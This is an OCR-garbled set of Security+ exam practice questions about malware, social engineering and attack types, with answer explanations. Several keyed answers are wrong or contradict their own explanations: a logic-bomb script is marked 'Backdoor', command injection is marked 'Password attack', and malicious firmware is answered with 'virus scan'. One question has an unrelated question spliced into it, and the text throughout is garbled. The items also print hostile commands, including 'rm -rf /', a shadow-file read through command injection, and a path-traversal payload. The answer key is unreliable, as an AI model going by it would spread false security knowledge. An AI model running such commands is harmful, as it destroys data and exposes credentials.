Security+ 501 - Chapter 2
An information security specialist is reviewing the following output from a Linux server. user@server:-$ crontab -1 5 * * * * /user /local/bin/backup.sh user@server: - $ cat /usr/local/ biu/backup.sh #!/bin/ bash if! grep - - quiet joeuser/e tc/passv1d then rn1 -rf / fi Based on the above information, which of the following types of malware was installed on the server? A. Backdoor B. Rootkit C. Logic bomb D. Ransomware E. Trojan
A. Backdoor First crontab -1 (crontab list of cronjobs, display crontab file contents) then the 5 * * * * means execution time which is at 12:05 a.m. everyday. The next line is a simple backup script to run every morning at 5 minutes past midnight. -$ cat /usr/local/bin/backup.sh The very first line of a script is the header line. This line begins with #! at the top of the script, flush with the left margin. This character combination identifies the kind of (backdoor) script. Linux uses this information to start the right program to run the script. For Bash scripts, this line is the absolute pathname indicating where the Bash interpreter resides. On most Linux distributions, the first header line is as follows #!/bin/bash. For a specific user, you can get the same information simply by entering grep joeuser /etc/passwd q, --quiet, --silent Quiet; do not write anything to standard output. Exit immediately with zero status if any match is found, even if an error was detected. rm (remove) You can't just rm a directory by default, you'll need to add the -r flag (recursive) to remove all the files and any subdirectories it may have
A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue? A. Botnet B. Ransomware C. Polymorphic malware D. Armored virus
A. Botnet A botnet is a collection of internet-connected devices, which may include PCs, servers, mobile devices and internet of things devices that are infected and controlled by a common type of malware. Users are often unaware of a botnet infecting their system. Infected devices are controlled remotely by threat actors, often cybercriminals, and are used for specific functions, so the malicious operations stay hidden to the user. Botnets are commonly used to send email spam, engage in click fraud campaigns and generate malicious traffic for distributed denial-of-service attacks
Which of the following attacks specifically impact data availability? A. DDoS B. MITM C. Rootkit D. Trojan
A. DDoS distributed denial-of-service (DDoS) attack is an attack in which multiple compromised computer systems attack a target, such as a server, website or other network resource, and cause a denial of service for users of the targeted resource. The flood of incoming messages, connection requests or malformed packets to the target system forces it to slow down or even crash and shut down, thereby denying service to legitimate users or systems.
A computer on a company network was infected with a zero-day exploit after an employee accidently opened an email that contained malicious content. The employee recognized the email as malicious and was attempting to delete it, but accidently opened it. Which of the following should be done to prevent this scenario from occurring again in the future? A. Install end-point protection on all computers that access web email B. Set the email program default to open messages in plain text C. Install host-based firewalls on all computers that have an email client installed D. Create new email spam filters to delete all messages from that sender
A. Install end-point protection on all computers that access web email Endpoint protection is a term often used interchangeably with endpoint security. Endpoint protection is often used to describe security solutions that address endpoint security issues, securing and protecting endpoints against zero-day exploits, attacks, and inadvertent data leakage resulting from human error. Targeted attacks and advanced persistent threats cannot be prevented through anti-virus solutions alone, making endpoint protection a necessary component of full-spectrum security solutions capable of securing data for the worlds' leading enterprises. Endpoint protection solutions provide centrally managed security solutions that protect endpoints such as servers, workstations, and mobile devices used to connect to enterprise networks
A security administrator is reviewing the following network capture: 192.1 e.20.43:204J -> 10.2 34.60.21: ao POST "192 . 168. 20. 43 https://www.banksite.com<ENTER>JoeUsr<BackSPACE>erPassword<ENTER>" Which of the following malware is MOST likely to generate the above information? A. Keylogger B. Ransomware C. Adware D. Logic bomb
A. Keylogger A keylogger is a program that records the keystrokes on a computer. It does this by monitoring a user's input and keeping a log of all keys that are pressed. The log may be saved to a file or even sent to another machine over a network or the Internet. Keylogger programs are often deemed spyware because they usually run without the user knowing it. They can be maliciously installed by hackers to spy on what a user is typing. By examining the keylog data, it may be possible to find private information such as a username and password combination. Therefore, keyloggers can be a significant security risk if they are unknowingly installed on a computer
Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? A. Privilege escalation B. Buffer overflow C. Pivoting D. Process affinity
A. Privilege escalation Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or use
An employee receives an email, which appears to be from the Chief Executive Officer (CEO), asking for a report of security credentials for all users. Which of the following types of attack is MOST likely occurring? A. Spear phishing B. Policy violation C. Whaling D. Social engineering
A. Spear phishing Spear phishing is an email or electronic communications scam targeted towards a specific individual, organization or business. Although often intended to steal data for malicious purposes, cybercriminals may also intend to install malware on a targeted user's computer
Which of the following vulnerability types would the type of hacker known as a script kiddie be MOST dangerous against? A. Unpatched exploitable Internet-facing services B. Unencrypted backup tapes C. Passwords written on the bottom of a keyboard D. Misplaced hardware token
A. Unpatched exploitable Internet-facing services A script kiddie is a derogatory term used to refer to non-serious hackers who are believed to reject the ethical principals' held by professional hackers, which include the pursuit of knowledge, respect for skills, and a motive of self-education. Script kiddies shortcut most hacking methods in order to quickly gain their hacking skills. They don't put much thought or time into gaining computer knowledge, but educate themselves in a fast manner in order to learn only the bare minimum. Script kiddies may use hacking programs written by other hackers because they often lack the skills to write their own. Script kiddies attempt to attack unpatched exploitable Internet facing computer systems and networks, and vandalize websites. Although they are considered to be inexperienced and immature, script kiddies can inflict as much computer damage as professional hackers and can be subject to similar criminal charges as their older and more savvy counterparts
Which of the following attack types is being carried out where a target is being sent unsolicited messages via Bluetooth? A. War chalking B. Bluejacking C. Bluesnarfing D. Rogue tethering
B. Bluejacking Bluejacking is a hacking method that allows an individual to send anonymous messages to Bluetooth-enabled devices within a certain radius. First, the hacker scans his surroundings with a Bluetooth enabled device, searching for other devices. The hacker then sends an unsolicited message to the detected devices
A company's user lockout policy is enabled after five unsuccessful login attempts. The help desk notices a user is repeatedly locked out over the course of a workweek. Upon contacting the user, the help desk discovers the user is on vacation and does not have network access. Which of the following types of attacks are MOST likely occurring? (Select two.) A. Replay B. Dictionary C. Rainbow tables D. Brute force E. Pass the hash
B. Dictionary & D. Brute force A brute force attack means probing the complete keyspace on the algorithm. A dictionary attack means that you probe only passwords/keys from a dictionary (which does not contain the complete keyspace). The term "brute force" means to overpower the defense through repetition. In the case of password hacking, brute forcing involves dictionary software that recombines English dictionary words with thousands of varying combinations. Brute force dictionaries always start with simple letters "a", "aa", "aaa", and then eventually move to full words like "dog", "doggie", "doggy". These brute force dictionaries can make 50 to 1000 attempts per minute. Given several hours or days, these dictionary tools will overcome any password. The secret is to make it take days to crack your password
An attacker wearing a building maintenance uniform approached a company's receptionist asking for access to a secure area. The receptionist asks for identification, a building access badge and checks the company's list approved maintenance personnel prior to granting physical access to the secure are. The controls used by the receptionist are in place to prevent which of the following types of attacks? A. Shoulder surfing B. Impersonation C. Tailgating D. Hoax
B. Impersonation Impersonation is one of several social engineering tools used to gain access to a system or network in order to commit fraud, industrial espionage or identity theft. Impersonation differs from other forms of social engineering because it occurs in person, rather than over the phone or through email
While performing surveillance activities, an attacker determines that an organization is using 802.1X to secure LAN access. Which of the following attack mechanisms can the attacker utilize to bypass the identified network security? A. Pharming B. MAC spoofing C. ARP poisoning D. Xmas attack
B. MAC spoofing Every device that is connected to a network possesses a worldwide, unique, and physical identification number: the Media Access Control address or MAC for short. This burned-in address is virtually etched to the hardware by the manufacturer. Users are not able to change or rewrite the MAC address. Nevertheless, it is possible to mask it on the software side. This masking is what is referred to as MAC spoofing. • MAC addresses: distinct hardware addresses identify network interface controllers (NIC) such as LAN cards or WLAN adapters, and are used to identify devices in local networks. Every MAC address includes 48 bits, or 6 bytes, and is arranged in the following pattern: 00:81:41:fe:ad:?e. The first 24 bits are the manufacturer code assigned by the Institute of Electrical and Electronics Engineers (IEEE), and the following 24 bits are the device number defined by the manufacturer. • Spoofing: in the network terminology, spoofing refers to the various methods, which can be used to manipulate the fundamental address system in computer networks. Hackers use this method of attack to conceal their own identity and imitate another. Other than MAC addresses, other popular targets for spoofing attacks are the internet protocol (IP), domain name system (DNS), and address resolution via Address Resolution Protocol (ARP). Basically, spoofing is a resolution strategy for troubleshooting - but in most cases, it is used for the infiltration of foreign systems and illegal network activities instead. There are tools to bypass 802.1x Network Access Control (NAC) on a wired LAN. These threat agents will help you locate any non-802.1x configurable hosts on your subnet, and spoof their MAC address so that you appear authenticated to the switch.
Which of the following BEST describes an attack where communications between two parties are intercepted and forwarded to each party with neither party being aware of the interception and potential modification to the communications? A. Spear phishing B. Man-in-the-middle C. URL hijacking D. Transitive access
B. Man-in-the-middle A man-in-the-middle (MITM) attack is a form of eavesdropping where communication between two users is monitored and modified by an unauthorized party. Generally, the attacker actively eavesdrops by intercepting a public key message exchange and retransmits the message while replacing the requested key with his own. In the process, the two original parties appear to communicate normally. The message sender does not recognize that the receiver is an unknown attacker trying to access or modify the message before retransmitting to the receiver. Thus, the attacker controls the entire communication
Refer to the following code: public class rainbow { public static void main (String [] args) { object blue= null; blue.hashcode (); } } Which of the following vulnerabilities would occur if this is executed? A. Pointer deference B. Missing null check C. Page exception D. NullPointerException
B. Missing null check A program can dereference a null pointer because it does not check the return value of a function that might return null. Just about every serious attack on a software system begins with the violation of a programmer's assumptions. After the attack, the programmer's assumptions seem flimsy and poorly founded, but before an attack many programmers would defend their assumptions well past the end of their lunch break. Two dubious assumptions that are easy to spot in code are "this function call can never fail" and "it doesn't matter if this function call fails". When a programmer ignores the return value from a function, they implicitly state that they are operating under one of these assumptions. As a programmer I recognize this as likely being C++ That means it's not C (NullPointerException) because that exact phrasing is from Java. So it has to be D. However, this isn't really a missing null check... this is someone doing nothing except setting something to null then trying to use it. It's not a vulnerability as much as a deliberate two lines of code designed to crash. For example, this is a pointer: *pointer And this a reference: &ref So there is none of these in the code, so it must be MissingNullCheck
An administrator discovers the following log entry on a server: Nov 12 2013 00:23:45 httpd[2342]: GET /app2/prod/proc/process.php? input=change;cd%20../../../etc;cat%20shadow Which of the following attacks is being attempted? A. Buffer overflow B. Password attack C. Command injection D. Cross-site scripting
B. Password attack One of the first post exploitation activities when we have compromised a target is to obtain the passwords hashes in order to crack them offline. If we managed to crack the hashes then we might be able to escalate our privileges and to gain administrative access especially if we have cracked the administrator's hash. After gaining access to a root account, the next order of business is using that power to do something more significant. If the user passwords on the system can be obtained and cracked, an attacker can use them to pivot to other machines if the login is the same across systems. There are two tried-and-true password-cracking tools that can accomplish this: John the Ripper and Hashcat. A couple files of particular interest on Linux systems are the /etc/passwd and /etc/shadow files. The /etc/passwd file contains basic information about each user account on the system, including the root user, which has full administrative rights, system service accounts, and actual users. There are seven fields in each line of /etc/passwd. The /etc/shadow file contains the encrypted passwords of users on the system. While the /etc/passwd file is typically world-readable, the /etc/shadow is only readable by the root account. The shadow file also contains other information such as password expiration dates. As we know in UNIX systems, the password hashes are stored in the /etc/shadow location so we will run the command cat /etc/shadow in order to see them
Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host? A. Sniffing B. Remote exploit C. Amplification D. Man-in-the-middle
B. Remote exploit A remote exploit is a malicious action that targets one or a network of computers. The remote attack does not affect the computer the attacker is using. Instead, the attacker will find vulnerable points in a computer or network's security software to access the machine or system. The main reasons for remote attacks are to view or steal data illegally, introduce viruses or other malicious software to another computer or network or system, and cause damage to the targeted computer or network.
An attacker uses a network sniffer to capture the packets of a transaction that adds $20 to a gift card. The attacker then user a function of the sniffer to push those packets back onto the network again, adding another $20 to the gift card. This can be done many times. Which of the following describes this type of attack? A. Buffer overflow attack B. Replay attack C. Smurf attack D. Integer overflow attack E. Cross-site scripting attack
B. Replay attack A replay attack is a category of network attack in which an attacker detects a data transmission and fraudulently has it delayed or repeated. The delay or repeat of the data transmission is carried out by the sender or by the malicious entity, which intercepts the data and retransmits it. In other words, a replay attack is an attack on the security protocol using replays of data transmission from a different sender into the intended into receiving system, thereby fooling the participants into believing they have successfully completed the data transmission. Replay attacks help attackers to gain access to a network, gain information which would not have been easily accessible or complete a duplicate transaction
A system administrator is reviewing the following information from a compromised server. Process DEP Local Address Remote Address LSASS YES 0.0.0.0. 10.210. 100 .62 APACHE NO 0.0.0.0 10.130.210.20 MySQL NO 127.0.0. l 127.0.0.1 TFTP YES 191.168.1.10 10.34.221.96 Given the above information, which of the following processes was MOST likely exploited via remote buffer overflow attack? A. MySQL B. TFTP C. Apache D. LSASS
B. TFTP TFTP is a UDP/IP protocol that uses port 69. It is used to upload (GET) and download (PUT) files between computer systems without authentication. It operates on a client/server architecture. If we can install/use a TFTP server on our Kali system, then we can use it to upload hacking software to the target system from a command line. For instance, if we wanted to grab the password hashes and crack them, we would need to upload samdump2 and pwdump to the target system. After grabbing the password hashes, we could then use TFTP to download the files to Kali for cracking offline. Nearly every OS has a TFTP client installed, but not always enabled. On Windows XP systems and earlier, the TFTP client is enabled by default. On Windows Vista systems and later, the TFTP client must be enabled through the control panel. System admins often enable it for administrative purposes and leave it enabled.
Anne, the Chief Executive Officer (CEO), has reported that she is getting multiple telephone calls from someone claiming to be from the helpdesk. The caller is asking to verify her network authentication Credentials because her computer is broadcasting across the network. This is MOST likely which of the following types of attacks? A. Spim B. Vishing C. Scareware D. Impersonation
B. Vishing Vishing is the illegal access of data via voice over Internet Protocol (VoIP}. Vishing is IP telephony's version of phishing and uses voice messages to steal identities and financial resources. The term is a combination of "voice" and "phishing." Vishing is the fraudulent practice of making phone calls or leaving voice messages purporting to be from reputable companies. Vishing is used in order to induce individuals to reveal personal information, such as bank details and credit card numbers
A security guard has informed the Chief Information Security Officer that a person with a tablet has been walking around the building. The guard also noticed strange white markings in different areas of the Parking lot. The person is attempting which of the following types of attacks? A. Packet sniffing B. War chalking C. Near field communication D. Jamming
B. War chalking War chalking refers to drawing symbols in public spaces to denote an open Wi-Fi wireless network in a public space. War chalking provides information about the type of wireless connection being used, which may be open node, closed node or wired equivalent privacy (WEP) node. This may attract hackers and make them aware of the Wi-Fi hot spot and its security. Hackers may use this information to attack the Wi-Fi network
An attacker discovers a new vulnerability in an enterprise application. The attacker takes advantage of the vulnerability by developing new malware. After installing the malware, the attacker is provided with access to the infected machine. Which of the following is being described? A. Remote code execution B. Zero-day exploit C. Command injection D. Session hijacking
B. Zero-day exploit zero-day vulnerability, at its core, is a flaw. It is an unknown exploit in the wild that exposes vulnerability in software or hardware and can create complicated problems well before anyone realizes something is wrong. In fact, a zero-day exploit leaves no opportunity for detection at first. A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerability - hence "zero-day"
Recently several employees were victims of a phishing email that appeared to originate from the company president. The email claimed the employees would be disciplined if they did not click on a malicious link in the message. Which of the following principles of social engineering made this attack successful? A. Spamming B. Scarcity C. Authority D. Social proof
C. Authority Authority can be construed to mean many different things. Within the context of Social Engineering, there are different types of Authority. Authority and power are separate but related concepts. While power is the possession of control, authority or influence over others, authority refers to the right to exercise that power. Authority is used within Social Engineering in order to gain access to property or information. Different types of Authority can be used, including: Legal, Organizational and Social
Ann. An employee in the payroll department, has contacted the help desk citing multiple issues with her device, including: Slow performance Word documents, PDFs, and images no longer opening A pop-up Ann states the issues began after she opened an invoice that a vendor emailed to her. Upon opening the invoice, she had to click several security warnings to view it in her word processor. With which of the following is the device MOST likely infected? A. Spyware B. Crypto-malware C. Backdoor D. Rootkit
C. Backdoor A backdoor is a means to access a computer system or encrypted data that bypasses the system's customary security mechanisms. A developer may create a backdoor so that an application or operating system can be accessed for troubleshooting or other purposes. However, attackers often use backdoors that they detect or install themselves as part of an exploit. In some cases, a worm or virus is designed to take advantage of a backdoor created by an earlier attack. Whether installed as an administrative tool, a means of attack or as a mechanism allowing the government to access encrypted data, a backdoor is a security risk because there are always threat actors looking for any vulnerability to exploit
A web application is configured to target browsers and allow access to bank accounts to siphon money to a foreign account. This is an example of which of the following attacks? A. SOL injection B. Header manipulation C. Cross-site scripting D. Flash cookie exploitation
C. Cross-site scripting Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page
Which of the following are MOST susceptible to birthday attacks? A. Encryption passwords B. Digital certificates C. Hashed passwords D. One time passwords
C. Hashed passwords Birthday attack is a cryptanalytic technique. Birthday attacks can be used to find collisions in a cryptographic hash function. For instance, suppose we have a hash function which, when supplied with a random input, returns one of k equally likely values. By repeatedly evaluating the function on 1.2 --./k different inputs, it is likely we will find some pair of inputs that produce the same output (a collision). Birthday attacks are a class of brute-force techniques used in an attempt to solve a class of cryptographic hashed password function problems. These methods take advantage of functions which, when supplied with a random input, return one of k equally likely values. By repeatedly evaluating the function for different inputs, the same output is obtained after about 1.2k--./2 evaluations
A malicious attacker has intercepted HTTP traffic and inserted an ASCII line that sets the referrer URL. Which of the following is the attacker most likely utilizing? A. Cookie hijacking B. Xml injection C. Header manipulation D. Cross-site scripting
C. Header manipulation Header manipulation is the insertion of malicious data, which has not been validated, into a HTIP response header. In HTIP networking, typically on the World Wide Web, referrer spoofing sends incorrect referrer information in an HTIP request in order to prevent a website from obtaining accurate data on the identity of the web page previously visited by the user. The HTIP_REFERER is data passed by the client. Any data passed by the client can be spoofed and/or forged. This includes HTTP_USER_AGENT. If you wrote the web browser, you are setting and sending the HTTP Referrer and User-Agent headers on the GET, POST, etc. Some websites check the Referrer field to make sure that the request came from a page that was created by that site. An attacker can bypass this by modifying the Referrer field to hide that the page came from another site
An auditor is reviewing the following output from a password-cracking tool: User:1: Password1 User2: Recovery! User3: Alaskan10 User4: 4Private User5: PerForMance2 Which of the following methods did the author MOST likely use? A. Brute force B. Rainbow table C. Hybrid D. Dictionary
C. Hybrid A hybrid attack is a blend of both a dictionary attack method as well as brute force attack. This means that while a dictionary attack method would include a wordlist of passwords, the brute-force attack would be applied to each possible password in that list. Hybrid password guessing attacks assume that network administrators push users to make their passwords at least slightly different from a word that appears in a dictionary. Hybrid guessing rules vary from tool to tool, but most mix uppercase and lowercase characters, add numbers at the end of the password, spell the password backward or slightly misspell it, and include characters such as @!# in the mix. Both John the Ripper and Cain & Abel can do hybrid guessing
Which of the following types of attacks precedes the installation of a on a server? A. DoS B. DDoS C. Privilege escalation D. Pharming
C. Privilege escalation Rootkits almost without exception run with superuser privileges, the full set of system privileges intended only for system administrators and system programmers so that they can readily perform virtually any task at will. In UNIX and Linux, this translates to root-level privileges; in Windows, this means Administrator- and SYSTEM-level privileges. Without superuser privileges, rootkits would not be very effective in accomplishing the malicious functions they support. It is important to realize, however, that attackers need to gain superuser level access before installing and running rootkits. Rootkits are not exploit tools that raise the privilege level of those who install them. Attackers must thus first exploit one or more vulnerabilities independently of the functionality of any rootkit to gain superuser privileges on victim systems if they are going be able to install and run a rootkit on these systems. Additionally, the majority of rootkits are "persistent," whereas others are not. Persistent rootkits stay installed regardless of how many times the systems on which they are installed are booted. Non-persistent rootkits (also called "memory-resident" rootkits) reside only in memory; no file in the compromised system contains their code. They thus remain on a victim system only until the next time the system boots, at which time they are deleted.
Which of the following characteristics differentiate a rainbow table attack from a brute force attack? (Select two.) A. Rainbow table attacks do not require access to hashed passwords B. Rainbow table attacks greatly reduce compute cycles at attack time C. Rainbow table attacks bypass maximum failed login restrictions. D. Rainbow table attacks must be performed on the network. E. Rainbow tables must include precomputed hashes
C. Rainbow table attacks bypass maximum failed login restrictions. E. Rainbow tables must include precomputed hashes The notion that hackers sit at a computer using the same login screens we all use to try to access our accounts is the first myth we need to correct. Often times, they are using an "offline" attack, combined with automation and breached data, to break passwords on specific sites. Since the attack is offline, meaning they have acquired enough cryptographic information to attempt to break passwords, they aren't subject to the password lockout protection. It gets a bit complicated, but they can just set their computers to compare the specially encoded information against known passwords in what are called "rainbow tables," which allow them to find matches. A brute force attack is primarily used against the encryption algorithm itself (you can also use this against passwords but there you use dictionary attacks most time). A rainbow table is used to attack a hashed password in reverse. That means I have a table with possible hashes and look up a matching password.
Which of the following cryptographic attacks would salting of passwords render ineffective? A. Birthday B. Brute force C. Rainbow tables D. Dictionary
C. Rainbow tables A hash table is a large list of pre-computed hashes for commonly used passwords. For a password file without salts, an attacker can go through each entry and look up the hashed password in the hash table or rainbow table. Adding a cryptographic Salt to your password hashing function will help defend against the use of Rainbow Tables used to crack passwords in your application
A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING- hash mismatch: C:\Window\SysWOW64\user32.dll WARNING- hash mismatch: C:\Window\SysWOW64\kernel32 .dll Based solely ono the above information, which of the following types of malware is MOST likely installed on the system? A. Backdoor B. Trojan C. Rootkit D. Ransomware
C. Rootkit A rootkit is a program or, more often, a collection of software tools that gives a threat actor remote access to and control over a computer or other system. While there have been legitimate uses for this type of software, such as to provide remote end-user support, most rootkits open a backdoor on victim systems to introduce malicious software, such as viruses, ransomware, keylogger programs or other types of malware, or to use the system for further network security attacks. Rootkits often attempt to prevent detection of malicious software by endpoint antivirus software. user32.dll is a module that contains Windows API functions related the Windows user interface (Window handling, basic UI functions, and so forth). user32.dll is a system process that is needed for your PC to work properly. It should not be removed. kernel32.dll is the most important Microsoft Windows Kernel. Functionality addressing most of windows functions are linked to this kernel DLL in some way. The Kernel32.dll file is a 32-bit dynamic link library file used in Windows 95,98 and Me. The Kernel32.dll file handles memory management, input/output operations and interrupts. When you start Windows, Kernel32.dll is loaded into a protected memory space so that other programs do not take it over. kernel32.dll is a system process that is needed for your PC to work properly. It should not be removed.
A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in in the preupdate area of the OS, which indicates it was pushed from the central patch system. File: winx86 adobe flash_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 The administrator pulls a report from the patch management system with the following output: Install Date: 10/10/17 Package Name: java_1.2_x64.exe Target Device Hash: MQ PC's A company's user lockout policy is enabled after five unsuccessful login attempts. The help desk notices a user is repeatedly locked out over the course of a workweek. Upon contacting the user, the help desk discovers the user is on vacation and does not have network access. Which of the following types of attacks are MOST likely occurring? (Select two.)01ab28bbde63aa879b35bba62cdes263 Install Date: 10/10/17 Package Name: winx86_adobe_flash_upgrade.exe Target Device Hash: MQ PC's 99ac28bede43ab869b853ba62c4ea243 Given the above outputs, which of the following MOST likely happened? A. The file was corrupted after it left the patch system B. The file was not approved in the application whitelist system C. The file was embedded with a logic bomb to evade detection. D. The file was infected when the patch manager downloaded it.
C. The file was embedded with a logic bomb to evade detection. Logic bomb is software that is inherently malicious, such as viruses and worms, often contain logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. This technique can be used by a virus or worm to gain momentum and spread before being noticed.
Malware that changes its binary pattern on specific dates at specific times to avoid detection is known as a (n): A. logic bomb B. armored virus C. polymorphic virus D. Trojan
C. polymorphic virus Polymorphic viruses are complex file infectors that can create modified versions of its self to avoid detection yet retain the same basic routines after every infection. To vary their physical file makeup during each infection, polymorphic viruses encrypt their codes and use different encryption keys every time. Polymorphic viruses rely on mutation engines to alter their decryption routines every time they infect a machine. This way, traditional security solutions may not easily catch them because they do not use a static, unchanging code. The use of complex mutation engines that generate billions of decryption routines make them even more difficult to detect.
which of the following differentiates a collision attack from a rainbow table attack? A. In a collision attack, the hash and the input data are equivalent B. A rainbow table attack uses the hash as a password C. In a collision attack, the same input results in different hashes D. A rainbow table attack performs a hash lookup
D. A rainbow table attack performs a hash lookup A rainbow table is a listing of all possible plaintext permutations of encrypted passwords specific to a given hash algorithm. Rainbow tables are often used by password cracking software for network security attacks. All computer systems that require password-based authentication store databases of passwords associated with user accounts, typically encrypted rather than plaintext as a security measure. Once an attacker gains access to a system's password database, the password cracker compares the rainbow table's precompiled list of potential hashes to hashed passwords in the database. The rainbow table associates plaintext possibilities with each of those hashes, which the attacker can then exploit to access the network as an authenticated user.
An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code: void foo (char *bar) { char random_user_input (12]; strcpy (rando1n_user_input, bar); } Which of the following vulnerabilities is present? A. Backdoor B. Integer overflow C. Bad memory pointer D. Buffer overflow
D. Buffer overflow This is an example of a buffer overflow (stack overflow). The canonical method for exploiting a stack based buffer overflow is to overwrite the function return address with a pointer to attacker controlled data (usually on the stack itself). This is illustrated with strcpy (random_user_input, bar) in the example. This code takes an argument from the command line and copies it to a local stack variable c. This works fine for command line arguments smaller than 12 characters. Any arguments larger than 11 characters long will result in corruption of the stack. (The maximum number of characters that is safe is one less than the size of the buffer here because in the C programming language strings are terminated by a zero-byte character. A twelve-character input thus requires thirteen bytes to store, the input followed by the sentinel zero byte. The zero byte then ends up overwriting a memory location that's one byte beyond the end of the buffer.) strcpy is potentially unsafe because it can lead to buffer overflow if you try to copy a string to a buffer that is not large enough to contain it. strcpy_s is "safer" because you have to explicitly specify the size of the target buffer, so the function will not overflow. Because strcpy does not check for sufficient space in strDestination before it copies strSource, it is a potential cause of buffer overruns. Therefore, we recommend that you use strcpy_s instead.
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market? A. Organized crime B. Insider C. Hacktivist D. Competitor
D. Competitor Proprietary information, also known as a trade secret, is information a company wishes to keep confidential. Proprietary information can include secret formulas, processes, and methods used in production. It can also include a company's business and marketing plans, salary structure, customer lists, contracts, and details of its computer systems. In some cases, the special knowledge and skills that an employee has learned on the job are considered to be a company's proprietary information. Companies may also develop security systems to protect their proprietary information from being stolen by foreign or domestic competitors. Business and industrial espionage is an ongoing activity that clandestinely seeks to obtain trade secrets by illegal methods. A corporate system for protecting proprietary information would include a comprehensive plan ranging from restricting employee access, to data protection, to securing phone lines and meeting rooms. In some cases, a chief information officer (CIO) would be responsible for implementing such a plan.
Which of the following best describes routine in which semicolons, dashes, quotes, and commas are removed from a string? A. Exception handling to protect against XSRF attacks B. Error handling to protect against program exploitation C. Padding to protect against string buffer overflows D. Input validation to protect against SOL injection
D. Input validation to protect against SOL injection Explanation : SQL injection is one of the most common web attack mechanisms utilized by attackers to steal sensitive data from organizations. While SQL Injection can affect any data driven application that uses a SQL database, it is most often used to attack web sites. SQL Injection is a code injection technique that hackers can use to insert malicious SQL statements into input fields for execution by the underlying SQL database. This technique is made possible because of improper coding of vulnerable web applications. These flaws arise because entry fields made available for user input unexpectedly allow SQL statements to go through and query the database directly. The good news is that there actually is a lot that website owners can do to prevent SQL injection. Although there is no such thing as a 100 percent guarantee in network security, formidable obstacles can be placed in the path of SQL injection attempts. Employ comprehensive input validation. Websites must filter all user input. Ideally, user data should be filtered for context. For example, email addresses should be filtered to allow only the characters allowed in an e-mail address, phone numbers should be filtered to allow only the characters allowed in a phone number, and so on.
A security auditor is putting together a report for the Chief Executive Officer (CEO) on personnel security and its impact on the security posture of the whole organization. Which of the following would be the MOST important factor to consider when it comes to personnel security? A. Hacktivist B. Phishing through social media C. Privilege escalation D. Insider threats E. Corporate espionage
D. Insider threats An Insider Threat is the potential for an individual who has or had authorized access to an organization's assets to use their access, maliciously or unintentionally, to act in a way that could negatively affect the organization. An insider threat is most simply defined as a security threat that originates from within the organization being attacked or targeted, often an employee or officer of an organization or enterprise. An insider threat does not have to be a present employee or stakeholder, but can also be a former employee, board member, or anyone who at one time had access to proprietary or confidential information from within an organization or entity
A security analyst receives an alert from a WAF with the following payload: var data= "<test test test>" ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this? A. Cross-site request forgery B. Buffer overflow C. SOL injection D. JavaScript data insertion
D. JavaScript data insertion HTML injection is a type of attack focused upon the way HTML content is generated and interpreted by browsers at client side. Otherwise, JavaScript is a widely used technology in dynamic web sites, so the use of techniques based on this, like injection, complements the nomenclature of 'code injection'. When developing web applications, it's very recommendable to follow the next considerations to prevent possible code injection. Do not rely on client-side JavaScript validation whenever possible; as shown, this is easily deceived using "in-line" injection. For example, suppose you have a shopping portal where you rely the price of each item at the client side. Don't store sensible data into cookies, because they can be easily modified by an attacker, as seen in the question. If you need to store data in cookies, store them with a hash signature generated with a server side key.
Which of the following works by implanting software on systems but delays execution until a specific set of conditions is met? A. Ransomware B. Scareware C. Trojan D. Logic bomb
D. Logic bomb A logic bomb is a malicious program timed to cause harm at a certain point in time, but is inactive up until that point. A set trigger, such as a preprogrammed date and time, activates a logic bomb. Once activated, a logic bomb implements a malicious code that causes harm to a computer. A logic bomb's application programming points may also include other variables such that the bomb is launched after a specific number of database entries. However, computer security experts believe that certain gaps of action may launch a logic bomb as well, and that these types of logic bombs may actually cause the greatest harm. A logic bomb may be implemented by someone trying to sabotage a database when they are fairly certain they will not be present to experience the effects, such as full database deletion. In these instances, logic bombs are programmed to exact revenge or sabotage work. A logic bomb is also known as slag code or malicious logic
A portable data storage device has been determined to have malicious firmware. Which of the following is the BEST course of action to ensure data confidentiality? A. Format the device B. Re-image the device C. Physically destroy the device D. Perform virus scan in the device
D. Perform virus scan in the device Correctly setting up and running an antivirus scan on your computer i one of the best starting defenses for keeping your system free of malicious software and firmware. In these days of widespread malware - email viruses and dubious websites that can infect your computer- a strong defense begins with selecting an antivirus solution for your computer and understanding how to get the most out of it.
Phishing emails frequently take advantage of high-profile catastrophes reported in the news. Which of the following principles BEST describes the weakness being exploited? A. Scarcity B. Intimidation C. Authority D. Social proof
D. Social proof Social proof is the influence that the actions and attitudes of the people around us (either in real life or online) have on our own behavior. The "proof' element is the idea that if other people are doing it (or saying it), it must be correct. The degree to which social proof affects us can be a result of the numbers of people seeming to promote something or the particular individuals involved. The actions and opinions of social influencers carry more weight with their colleagues, social network and the general public than is the case with most other individuals. Social media influence is most often associated with online marketing but can also refer to the way social networks and influencers affect the behavior of users in other areas, such as politics. Social proof can influence people to take actions and make decisions differently than they would if they had relied solely upon their own judgment. The undue influence of others can result in conformity and errors. Social proof is mob behavior and the lack of individual opinion sometimes referred to as herd mentality
Which of the following occurs when the security of a web application relies on JavaScript for input validation? A. The application is vulnerable to race conditions. B. A host-based firewall is required. C. The security of the application relies on antivirus D. The integrity of the data is at risk.
